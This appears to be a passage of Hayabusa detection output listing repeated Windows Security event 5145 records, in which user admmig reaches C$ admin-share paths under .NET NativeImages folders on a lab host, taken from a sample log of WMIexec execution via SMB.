0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 
20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 